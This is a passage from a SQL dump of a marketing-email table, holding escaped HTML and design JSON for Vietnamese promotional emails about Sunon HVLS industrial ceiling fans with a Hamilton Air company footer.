style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677919418531-du-an-tieu-bieu.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 780px;\\\" width=\\\"780\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"tel:02873033369\\\" style=\\\"height:37px; v-text-anchor:middle; width:147px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"tel:02873033369\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">T\\u01b0 v\\u1ea5n b\\u00e1n h\\u00e0ng<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #272362;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: #272362;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"800\\\" style=\\\"background-color: #ecf0f1;width: 800px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 800px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:13px 40px 10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 19px; color: #000000; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 40px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #000000; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(10, 'Sunon - Powerful HVLS Fan series 1', '', 9, 0, 1, 'vietnamese', '', 18, '2023-04-12 11:42:39', '', 'Sunon - Powerful HVLS Fan series 1', 17, '', '', '', '', '', '\"{\\\"counters\\\":{\\\"u_row\\\":12,\\\"u_column\\\":25,\\\"u_content_text\\\":17,\\\"u_content_image\\\":29,\\\"u_content_button\\\":11,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":17,\\\"u_content_heading\\\":7,\\\"u_content_text_deprecated\\\":1},\\\"body\\\":{\\\"id\\\":\\\"nY2UpNg7xs\\\",\\\"rows\\\":[{\\\"id\\\":\\\"CvMouKqZza\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"MIyWoeK0P3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wkMmc2BYL9\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167194545-logo_sunon.png\\\",\\\"width\\\":1280,\\\"height\\\":375,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mWDZmdczN4\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"color\\\":\\\"#000000\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">\\u00a0QU\\u1ea0T TREO TR\\u1ea6N C\\u00c1NH L\\u1edaN HVLS - THO\\u1ea2I M\\u00c1I C\\u00d4NG NGHI\\u1ec6P V\\u1edaI <span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\">TI\\u1ebeT<\\/span> <\\/span>KI\\u1ec6M N\\u0102NG L\\u01af\\u1ee2NG L\\u1edaN.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"9BLYLfou98\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h1\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"22px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_2\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"M\\u1ed9t kho\\u1ea3nh kh\\u1eafc th\\u01b0 gi\\u00e3n v\\u1edbi l\\u00e0n gi\\u00f3 m\\u1ea1nh v\\u00e0 d\\u1ecbu d\\u00e0ng\\\"}},{\\\"id\\\":\\\"Al64RPrqki\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"22px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Powerful HVLS Fan series 1\\\"}},{\\\"id\\\":\\\"SVqUDwpXSL\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371874963-Powerful1-02.jpg\\\",\\\"width\\\":1581,\\\"height\\\":544,\\\"autoWidth\\\":true,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_24\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"rsmsEr3foW\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_7\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#fbfdff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"_Gkf3-xZ_P\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"ln9Z193LbY\\\",\\\"contents\\\":[{\\\"id\\\":\\\"0ykyQAdF8x\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371919938-1-06.jpg\\\",\\\"width\\\":346,\\\"height\\\":346},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_25\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_20\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"60jvGugOEl\\\",\\\"contents\\\":[{\\\"id\\\":\\\"meCjAQxU6o\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><strong>PHONG C\\u00c1CH C\\u00d4NG NGHI\\u1ec6P T\\u1ed0I GI\\u1ea2N<\\/strong><br \\/>Qu\\u1ea1t HVLS n\\u00e0y c\\u00f3 c\\u1ea3 t\\u00ednh th\\u1ea9m m\\u1ef9 v\\u00e0 ch\\u1ee9c n\\u0103ng. Thi\\u1ebft k\\u1ebf t\\u1ed1i gi\\u1ea3n v\\u00e0 c\\u00f4ng nghi\\u1ec7p kh\\u00f4ng c\\u00f3 chi ti\\u1ebft trang tr\\u00ed th\\u1eeba, ph\\u00f9 h\\u1ee3p v\\u1edbi m\\u1ecdi phong c\\u00e1ch v\\u00e0 kh\\u00f4ng gian th\\u01b0\\u01a1ng m\\u1ea1i.<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_21\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"gmviGct8gm\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"ulBSNhkDgN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"GKwIgRl6J3\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371937464-2-05.jpg\\\",\\\"width\\\":346,\\\"height\\\":346},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_26\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_24\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"k23dWUc5oU\\\",\\\"contents\\\":[{\\\"id\\\":\\\"47CyCNvbg1\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_16\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><strong>THI\\u1ebeT K\\u1ebe WINGLET \\u0110\\u01af\\u1ee2C C\\u1ea4P B\\u1eb0NG S\\u00c1NG CH\\u1ebe<\\/strong><br \\/>Thi\\u1ebft k\\u1ebf Winglet \\u0111\\u00e3 \\u0111\\u01b0\\u1ee3c c\\u1ea5p b\\u1eb1ng s\\u00e1ng ch\\u1ebf \\u0111\\u1ec3 gi\\u1ea3m s\\u1ee9c c\\u1ea3n v\\u00e0 ti\\u1ebfng \\u1ed3n c\\u1ee7a gi\\u00f3, \\u0111\\u1ed3ng th\\u1eddi \\u0111i\\u1ec1u ch\\u1ec9nh ch\\u1ea5t l\\u01b0\\u1ee3ng t\\u1eaft ti\\u1ebfng t\\u1ed1t nh\\u1ea5t d\\u1ef1a tr\\u00ean h\\u1ec7 th\\u1ed1ng m\\u00f4 ph\\u1ecfng \\u00e2m thanh c\\u1ee7a \\u0110\\u1ee9c, t\\u1eadn h\\u01b0\\u1edfng l\\u00e0n gi\\u00f3 trong l\\u00e0nh v\\u00e0 y\\u00ean t\\u0129nh.<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_25\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"Ocpc9_JErE\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"u-hkauWKYK\\\",\\\"contents\\\":[{\\\"id\\\":\\\"9nISoDtJks\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371949851-3-04.jpg\\\",\\\"width\\\":346,\\\"height\\\":346},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_27\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_22\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"kbbSE6N6AJ\\\",\\\"contents\\\":[{\\\"id\\\":\\\"aa14nFFFnv\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_17\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><strong>\\u0110\\u1ed8NG C\\u01a0 BLDC SI\\u00caU M\\u1eceNG<\\/strong><br \\/>Hi\\u1ec7u su\\u1ea5t h\\u01a1n 90% c\\u1ee7a \\u0111\\u1ed9ng c\\u01a1 BLDC l\\u00f5i. \\u0110\\u1ed9ng c\\u01a1 si\\u00eau m\\u1ecfng nh\\u1eb9, thi\\u1ebft k\\u1ebf \\u00edt ng\\u1ed9t ng\\u1ea1t 